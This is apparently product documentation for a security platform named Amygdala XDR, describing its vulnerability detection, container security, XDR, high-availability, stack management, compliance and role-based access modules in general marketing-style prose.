Amygdala XDR's Vulnerability Detection integrates with patch management systems to enable automated remediation of vulnerabilities.

Severity assessment

Severity assessment

The module can provide information on the severity of the vulnerability, allowing organizations to prioritize remediation efforts.

Real-time alerts

Real-time alerts

Vulnerability Detection generates real-time alerts when a vulnerability is detected, allowing organizations to take immediate action to address the issue.

Compliance support

Compliance support

The module helps organizations meet compliance requirements by identifying and remediating known vulnerabilities in their environment.

Technical Description

Amygdala XDR’s Vulnerability Detection module allows users to scan their systems and detect potential vulnerabilities in their infrastructure. The module utilizes multiple vulnerability databases and scanners, including the Open Vulnerability Assessment System (OpenVAS) and the National Vulnerability Database (NVD), to identify security weaknesses.

Amygdala XDR’s Vulnerability Detection module uses the Common Vulnerability Scoring System (CVSS) to rate the severity of vulnerabilities and prioritize which vulnerabilities to address first. The module integrates with various security tools and systems, including security information and event management (SIEM) systems, to provide a comprehensive view of security issues across an organization’s infrastructure.

The module also includes automatic vulnerability detection and reporting, as well as the ability to schedule vulnerability scans at regular intervals. Users can customize the module to meet their specific security needs, including creating custom rules and policies for vulnerability detection and remediation.

The vulnerability detection module uses a variety of technologies, including vulnerability databases, network scanning tools, and analysis engines, to identify and assess vulnerabilities across an organization’s infrastructure. It also relies on several protocols, such as the Simple Network Management Protocol (SNMP) and the Extensible Markup Language (XML), to collect and analyze data from a variety of sources.

Technology-Supported, Protocols

Amygdala XDR’s Vulnerability Detection module uses a combination of technologies and protocols to perform its functions. These include:

Vulnerability data sources Amygdala XDR uses different sources of vulnerability data such as the National Vulnerability Database (NVD), Common Vulnerabilities and Exposures (CVE) database, and other publicly available vulnerability data sources.

Vulnerability scanners Amygdala XDR integrates with popular vulnerability scanners such as OpenVAS and Nessus to scan for vulnerabilities on hosts and networks.

Network protocols Amygdala XDR uses various network protocols such as TCP, UDP, ICMP, and others to communicate with hosts and devices.

Logging protocols Amygdala XDR can collect logs from various sources using protocols such as Syslog, Windows Event Log, and others.

APIs Amygdala XDR provides APIs that allow integration with other systems and applications, making it easier to correlate vulnerability data with other security information.

These technologies and protocols work together to provide a comprehensive vulnerability detection system that can identify and alert potential vulnerabilities in real-time.

Module Dependency

Amygdala XDR’s Vulnerability Detection module depends on several open-source projects and libraries, including:

A popular open-source vulnerability scanner that is used to detect and report vulnerabilities in target systems.

Dashboards

Container Security

Amygdala XDR’s Container Security module provides visibility and protection for containerized applications and environments. It monitors your containers, images, and registries for vulnerabilities, compliance issues, and anomalous behavior. Container Security uses a combination of host and container-based sensors to collect and analyze data, allowing for early detection and response to potential security incidents. Additionally, it integrates with popular container orchestration platforms such as Kubernetes and Docker Swarm to provide seamless security management.

Features

Continuous Monitoring

Continuous Monitoring

It provides continuous monitoring of container images, host, and orchestration platforms to detect vulnerabilities and configuration issues.

Security Assessment

Security Assessment

It performs automatic security assessments of Docker containers and Kubernetes environments.

Risk Management

Risk Management

It provides a risk score for containers and clusters based on the severity of vulnerabilities, misconfigurations, and other security issues.

Compliance

Compliance

It can help you achieve compliance with industry security standards by detecting security issues and misconfigurations.

Integration

Integration

It integrates with popular container platforms like Docker and Kubernetes, and also with orchestration platforms like Docker Swarm and OpenShift

Technical Description

Amygdala XDR’s Container Security is designed to provide security monitoring for containerized environments, such as Docker and Kubernetes. The main goal of this module is to detect and respond to threats and anomalies within containerized applications and the infrastructure they run on.

Amygdala XDR’s Container Security module monitors container logs, image vulnerabilities, network traffic, and system calls for potential security threats. It also provides policy-based compliance monitoring to ensure that the containerized environment is configured and running according to best practices and security standards.

The technology used by Amygdala XDR’s Container Security includes integration with Docker and Kubernetes APIs, as well as the use of open-source security tools like Sysdig Falco, which is used for runtime container security. It also includes the use of vulnerability databases like the National Vulnerability Database (NVD) to detect and identify vulnerabilities in container images.

Amygdala XDR’s Container Security is designed to work seamlessly with other Amygdala XDR modules, such as intrusion detection and log analysis, to provide a complete security monitoring solution for containerized environments.

Technology-Supported, Protocols

Amygdala XDR’s Container Security supports various security and network protocols, such as TLS/SSL, SSH, and IPsec, as well as container technologies like Docker and Kubernetes. It also leverages several security-related tools and technologies, such as Docker Bench, OpenSCAP, and Kubernetes CIS Benchmark, to provide comprehensive container security monitoring and threat detection capabilities. Additionally, Amygdala XDR’s Container Security integrates with cloud platforms like AWS and Azure to provide centralized monitoring and management of container environments.

Module Dependency

Amygdala XDR’s Container Security module depends on several libraries and projects, including:

Amygdala XDR's Container Security uses Docker API to communicate with the Docker daemon to retrieve information about running containers and their configurations.

Dashboards

XDR

Amygdala XDR XDR (Extended Detection and Response) module of the Amygdala XDR platform enables your security teams to detect and respond to threats across multiple endpoints and cloud environments.

The XDR module integrates with other security tools and data sources, such as endpoint detection and response (EDR), cloud security posture management (CSPM), and security information and event management (SIEM) solutions, to provide a comprehensive view of the security posture of an organization. This allows security teams to detect and respond to threats in real-time, minimizing the impact of attacks.

The Amygdala XDR XDR module also includes automation and orchestration capabilities, which enable security teams to automate repetitive tasks and response actions, such as isolating an infected endpoint or blocking a malicious IP address. This helps to improve the efficiency of security operations and reduce the time to detect and respond to threats.

Overall, the Amygdala XDR XDR module is designed to help organizations improve their threat detection and response capabilities, by providing a unified view of their security posture and automating response actions to minimize the impact of attacks.

Features

Cross-platform visibility

Cross-platform visibility

Amygdala XDR XDR offers visibility across your multiple endpoints and platforms, including servers, workstations, mobile devices, and cloud environments.

Automated threat detection and response

Automated threat detection and response

Amygdala XDR XDR uses advanced analytics and machine learning algorithms to detect and respond to threats automatically, reducing the workload of security teams.

Incident response management

Incident response management

Amygdala XDR XDR provides a centralized platform for incident response management, allowing security teams to investigate incidents quickly and effectively.

Threat hunting

Threat hunting

Amygdala XDR XDR enables proactive threat hunting by allowing your security teams to analyze historical data and identify potential threats.

Real-time monitoring and alerting

Real-time monitoring and alerting

Amygdala XDR XDR provides real-time monitoring and alerting of potential threats, enabling your security teams to take action before damage occurs.

Compliance management

Compliance management

Amygdala XDR XDR provides compliance management capabilities, ensures your organizations comply with industry regulations and standards.

Integration

Integration

Amygdala XDR XDR integrates various security solutions and data sources such as Endpoint Detection and Response (EDR), Security Information and Event Management (SIEM), and Network Detection and Response (NDR) to provide a unified view of the organization's security posture.

Technology-Supported, Protocols

The Amygdala XDR XDR module supports a wide range of protocols to enable comprehensive threat detection and response across various endpoints and cloud environments.

Module Dependency

The Amygdala XDR XDR module has some dependencies on other components of the Amygdala XDR platform to function properly. Some of these dependencies include:

The Amygdala XDR XDR module requires an Amygdala XDR Manager instance to receive and analyze data from endpoints and cloud environments. The Amygdala XDR Manager collects and processes data from different sources and then sends it to the XDR module for analysis.

Dashboards

HA Management

HA (High Availability) management is an important aspect of managing an Amygdala XDR cluster. It refers to the ability to ensure that the cluster can continue to operate normally even in the event of hardware or software failures. HA management is critical in ensuring that the cluster remains available and responsive to user requests at all times.

Cluster topology

The topology of the Amygdala XDR cluster is critical to its HA management. A well-designed topology should include multiple nodes distributed across multiple physical hosts, data centers, or availability zones. This ensures that if one node or host fails, the cluster can continue to operate normally.

Load balancing

Amygdala XDR Load balancing manages the distribution of incoming requests across the nodes in the cluster. Load balancing can be achieved using various techniques, including DNS round-robin, hardware load balancers, or software-based load balancers

Monitoring

Monitoring is critical to ensuring that the Amygdala XDR cluster remains healthy and responsive. Various monitoring tools and techniques can be used to monitor the cluster's health, including Amygdala XDR's built-in monitoring modules, third-party monitoring tools, and custom scripts or plugins.

Replication

Amygdala XDR provides several replication mechanisms, including shard replication, index replication, and cross-cluster replication to copy data from one node to another to ensure that data is available even if one node fails.

Backup and recovery

Backup and recovery are important aspects of HA management in the Amygdala XDR. Regular backups of the cluster's data should be taken to ensure that data can be recovered in the event of a failure. Various backup and recovery tools can be used, including Amygdala XDR's built-in backup and restore modules, third-party backup tools, and custom scripts or plugins.

Features

The HA management in Amygdala XDR provides several features that ensure high availability and fault tolerance of the system. Some of these features include:
Scalability

Scalability

The Amygdala XDR HA architecture is designed to scale horizontally, meaning that new nodes can be added to the cluster to handle increased data traffic. The Load Balancer module ensures that the incoming data traffic is distributed across all the nodes in the cluster, providing a scalable and highly available system.

Redundancy

Redundancy

The Amygdala XDR HA architecture provides redundancy at multiple levels. For example, the Amygdala XDR Manager Cluster module provides redundancy by deploying multiple Amygdala XDR Manager nodes in an active-active configuration. This ensures that if one node fails, the other nodes can continue processing data without any disruption. Similarly, the Elasticsearch Cluster module provides redundancy by distributing data across multiple nodes in the cluster.

Failover

Failover

The Amygdala XDR HA architecture provides failover capabilities at multiple levels. For example, if a Amygdala XDR Manager node fails, the Load Balancer module automatically redirects the incoming data traffic to other active nodes in the cluster. Similarly, if an Elasticsearch node fails, the data is automatically redistributed to other nodes in the cluster.

Automatic Configuration

Automatic Configuration

The HA management modules in Amygdala XDR are designed to automatically configure themselves based on the number of nodes in the cluster. For example, the Correlation Rules Manager module ensures that the same set of correlation rules is applied across all the nodes in the cluster, regardless of their number.

Real-time Monitoring

Real-time Monitoring

The Amygdala XDR HA management modules provide real-time monitoring of the system's health and status. This ensures that any issues or failures can be quickly identified and resolved, minimizing any potential downtime.

Technology-Supported, Protocols

The HA management module in Amygdala XDR support a variety of protocols and technologies, including:

TCP/IP

TCP/IP

The communication between the different nodes in the Amygdala XDR HA architecture is based on the TCP/IP protocol.

HTTPS

HTTPS

The communication between the Amygdala XDR Manager and Amygdala XDR Agents is encrypted using the HTTPS protocol. The Load Balancer module also supports HTTPS traffic.

Elasticsearch API

Elasticsearch API

The Elasticsearch Cluster module uses the Elasticsearch API to manage and store data.

REST API

REST API

The Correlation Rules Manager module provides a REST API for managing correlation rules.

Kibana API

Kibana API

The Kibana module provides a REST API for data visualization and analysis.

Syslog

Syslog

The Amygdala XDR Manager and Amygdala XDR Agents can send and receive data using the Syslog protocol.

Stack Management

Amygdala XDR Stack Management module allows users to manage various aspects of the Amygdala XDR stack. This tab can be accessed by clicking on the Stack Management icon on the left-hand side of the UI.

Index Management

This module allows users to manage Amygdala XDR indices, including creating, deleting, and updating indices, as well as modifying index settings and mappings.

UI

This module allows users to manage UI settings, including configuring index patterns, creating visualizations and dashboards, managing UI plugins, and more.

Security

This module allows users to manage security settings in the Amygdala XDR stack, including configuring users and roles, managing access control, and configuring SSL/TLS encryption.

Replication

Amygdala XDR provides several replication mechanisms, including shard replication, index replication, and cross-cluster replication to copy data from one node to another to ensure that data is available even if one node fails.

Amygdala XDR

This module allows users to manage Amygdala XDR settings, including configuring node settings, managing cluster settings, and managing data nodes.

Watcher

This module allows users to manage Amygdala XDR Watcher settings, including configuring watches, managing watch history, and creating and managing actions.

Features

The Stack management in Amygdala XDR provides several features that ensure high availability and fault tolerance of the system. Some of these features include:

Dependency management

Dependency management

Amygdala XDR Stack Management helps manage dependencies in the security platform by ensuring that only authorized and secure dependencies are used.

Version control

Version control

Amygdala XDR Stack Management provides version control modules that allow security teams to track changes to code and configuration files.

Environment provisioning

Environment provisioning

Amygdala XDR Stack Management automates the process of setting up development and testing environments for the security platform, including installing required software and configuring settings.

Continuous integration and deployment

Continuous integration and deployment

Amygdala XDR Stack Management integrates with continuous integration and deployment (CI/CD) tools to automate the process of building, testing, and deploying the security platform.

Configuration management

Configuration management

Amygdala XDR Stack Management provides configuration management modules that allow security teams to manage configuration files and settings for the security platform.

Compliance management

Compliance management

Amygdala XDR Stack Management provides compliance management modules that help security teams ensure compliance with relevant security standards and regulations.

Regulatory compliance

Payment Card Industry Security Standard (PCI DSS): Amygdala XDR offers FIM and IDS capabilities that help organizations meet the PCI DSS requirements for file integrity monitoring and intrusion detection and prevention.

General Data Protection Regulation (GDPR)

Amygdala XDR's log analysis and FIM capabilities help organizations comply with GDPR requirements for data protection and incident response.

Health Insurance Portability and Accountability Act (HIPAA)

Amygdala XDR's log analysis and IDS capabilities help healthcare organizations comply with HIPAA requirements for security monitoring and incident response.

Federal Risk and Authorization Management Program (FedRAMP)

Amygdala XDR aligns with the NIST Cybersecurity Framework, which is a set of guidelines for managing and reducing cybersecurity risk.

Features

The regulatory compliance module of the Amygdala XDR is a key component of the platform, providing features such as:

Compliance monitoring

Compliance monitoring

The regulatory compliance module of Amygdala XDR helps organizations monitor their compliance with various security standards and regulations, such as PCI DSS, HIPAA, GDPR, and ISO 27001.

Customizable policies

Customizable policies

The module allows users to create customized compliance policies that are specific to their organization's needs and regulatory requirements.

Automated compliance checks

Automated compliance checks

The compliance module automates compliance checks to ensure that organizations are meeting the requirements of their chosen regulations. This helps to reduce the risk of non-compliance and associated penalties.

Real-time alerts

Real-time alerts

The compliance module provides real-time alerts for compliance violations, enabling organizations to quickly remediate any issues and maintain compliance.

Centralized management: The module provides a centralized dashboard for managing compliance, making it easy for organizations to view compliance status, policy violations, and remediation actions.

Reporting and audit trails: The compliance module provides detailed reports and audit trails that can be used to demonstrate compliance with regulations to auditors and regulators.

Integration with other Amygdala XDR modules: The compliance module is fully integrated with other Amygdala XDR modules, including intrusion detection, vulnerability assessment, and log analysis, providing a comprehensive security monitoring solution.

Technical Description

The regulatory compliance module of Amygdala XDR is designed to help organizations ensure that they comply with various security standards and regulations, such as PCI DSS, HIPAA, GDPR, and ISO 27001. This module provides a set of predefined rules and checks that are specific to each regulation and allows users to create customized policies that meet their specific needs.

The module’s functionality is based on the concept of auditing, which involves collecting data about the system’s configuration, events, and activities, and comparing them to a set of predefined rules to determine compliance status. The regulatory compliance module collects data from various sources, including system logs, network traffic, and system configuration files, and uses a combination of signature-based and anomaly-based detection techniques to identify potential compliance violations.

The module’s architecture consists of three main components: the data collection agent, the compliance engine, and the reporting and alerting system. The data collection agent is responsible for collecting data from various sources and forwarding it to the compliance engine. The compliance engine processes the collected data and compares it to the predefined rules and policies to determine compliance status. The reporting and alerting system provides real-time alerts and reports on compliance violations.

The compliance module’s predefined rules and policies cover a wide range of security controls, including access control, authentication, encryption, network security, and audit trails. These rules and policies are customizable, allowing organizations to tailor them to their specific needs and requirements.

The module provides real-time alerts and reports on compliance violations, allowing organizations to quickly identify and remediate issues. It also provides detailed reports and audit trails that can be used to demonstrate compliance with regulations to auditors and regulators.

Technology-Supported, Protocols

The regulatory compliance module of the Amygdala XDR supports a variety of technologies and protocols for collecting data and performing compliance checks. These include:

Syslog

Syslog

Amygdala XDR can collect data from systems that send syslog messages, which is a standard protocol for sending log messages across a network.

Windows Event Log

Windows Event Log

Amygdala XDR can collect data from the Windows Event Log, which is a centralized log service built into the Windows operating system.

File Integrity Monitoring

File Integrity Monitoring

Amygdala XDR can monitor changes to system files and directories using file integrity monitoring (FIM) techniques, such as checksums and digital signatures.

Network Traffic Analysis

Network Traffic Analysis

Amygdala XDR can perform compliance checks on network traffic using techniques such as deep packet inspection (DPI) and network intrusion detection (NIDS).

Configuration Auditing

Configuration Auditing

Amygdala XDR can perform compliance checks on system configurations using configuration auditing techniques, such as comparing system configurations to predefined baselines.

Application Logs

Application Logs

Amygdala XDR can collect data from application logs, including logs generated by web servers, databases, and other applications.

Module Dependency

The regulatory compliance module of the Amygdala XDR has some module dependencies that are required for its proper functioning. These dependencies are as follows:
Amygdala XDR Manager

Amygdala XDR Manager

The regulatory compliance module depends on the Amygdala XDR Manager, which is the central component of the Amygdala XDR platform. The Amygdala XDR Manager is responsible for receiving and processing data from data sources, and for forwarding compliance-related data to the compliance module.

Amygdala XDR API

Amygdala XDR API

The regulatory compliance module depends on the Amygdala XDR API, which provides a programmatic interface for managing the Amygdala XDR platform. The API is used by the compliance module to retrieve compliance-related data, such as compliance reports and alerts.

Amygdala XDR Agents

Amygdala XDR Agents

The regulatory compliance module depends on the Amygdala XDR agents, which are installed on the systems being monitored. The agents are responsible for collecting data from the monitored systems and forwarding it to the Amygdala XDR Manager for processing.

Dashboards

Amygdala XDR Role-based Access

The Amygdala XDR Role-based Access (RBA) module allows your administrators to define access control policies for users and groups based on their roles or functions within an organization. This module enables organizations to restrict access to sensitive data and functions to only authorized users.

It works by defining roles, which are groups of permissions that determine what actions a user or group can perform within the system. Permissions can be granted or denied for specific resources, such as files, directories, or applications.

The RBA module can be configured through the Amygdala XDR API or the Amygdala XDR management application, which provides a web interface for managing roles and permissions. The module is flexible enough to allow administrators to define complex access control policies and can be integrated with other Amygdala XDR modules, such as the File Integrity Monitoring (FIM) and Vulnerability Detection (VulnDetect) modules.

Features

The Role-based Access (RBA) module in Amygdala XDR offers several features, including:

Role-based access control

Role-based access control

The RBA module enables your administrators to define roles and permissions for users and groups based on their roles or functions within an organization. This allows for fine-grained control over who can access specific resources and functions within the system.

Granular permission management

Granular permission management

The module allows your administrators to grant or deny permissions for specific resources, such as files, directories, or applications. This helps to ensure that users only have access to the resources they need to perform their job functions.

Flexible configuration

Flexible configuration

The RBA module can be configured through the Amygdala XDR API or the Amygdala XDR management application, which provides a web interface for managing roles and permissions. This provides administrators with the flexibility to define complex access control policies that meet the needs of their organization.

Integration with other Amygdala XDR modules

Integration with other Amygdala XDR modules

The RBA module is integrated with other Amygdala XDR modules, such as the File Integrity Monitoring (FIM) and Vulnerability Detection (VulnDetect) modules. This allows for a comprehensive security solution that can detect and respond to threats across the entire system.

Audit trail

Audit trail

The RBA module provides an audit trail of all access requests and actions taken by users. This helps to ensure accountability and provides a record of who accessed what resources and when.

Technology-Supported, Protocols

The Role-based Access (RBA) module in Amygdala XDR uses various technologies and protocols to manage user access control. Some of the technologies and protocols used by the RBA module are:
Lightweight Directory Access Protocol (LDAP)

Lightweight Directory Access Protocol (LDAP)

The RBA module integrates with LDAP servers to manage user authentication and authorization. This allows for centralized management of user accounts and access control policies.

Security Assertion Markup Language (SAML)

Security Assertion Markup Language (SAML)

The RBA module supports SAML for single sign-on (SSO) authentication. This allows users to log in once and access multiple systems without having to re-enter their credentials.

Transport Layer Security (TLS)

Transport Layer Security (TLS)

The RBA module uses TLS to encrypt network traffic and ensure secure communication between components.

JavaScript Object Notation (JSON):

JavaScript Object Notation (JSON):

The RBA module uses JSON to store role and permission information in configuration files and databases.

Representational State Transfer (REST) API

Representational State Transfer (REST) API

The RBA module provides a REST API for managing roles and permissions. This allows administrators to automate access control tasks and integrate the RBA module with other systems.

OpenAPI Specification

OpenAPI Specification

The RBA module uses the OpenAPI Specification to describe the REST API and provide documentation for developers.

Architecture Diagram